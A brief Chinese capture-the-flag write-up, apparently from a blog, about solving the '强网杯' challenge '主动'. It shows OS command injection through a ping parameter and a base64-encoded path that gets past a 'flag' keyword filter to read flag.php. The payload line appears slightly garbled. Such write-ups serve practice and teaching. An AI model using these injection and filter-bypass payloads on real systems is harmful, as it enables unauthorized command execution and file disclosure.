打开环境
强网杯-主动
看到ping -c 3,属于命令注入
尝试传递ip=127.0.0.1;ls
得到
强网杯-主动
显然if里面的内容过滤掉了flag,而我们需要读取flag.php内的内容

使用通配符
强网杯-主动
Base64编码绕过
?id=1;cat echo 'Li9mbGFnLnBocAo=' | base64 -d

用cat读取flag
f12查看

相关文章:

  • 2022-01-11
  • 2021-07-26
  • 2022-12-23
  • 2021-12-09
  • 2021-12-13
  • 2021-05-13
  • 2021-12-09
  • 2021-07-03
猜你喜欢
  • 2021-05-09
  • 2021-04-18
  • 2021-05-21
  • 2022-12-23
  • 2021-05-20
  • 2021-12-08
  • 2021-11-12
相关资源
相似解决方案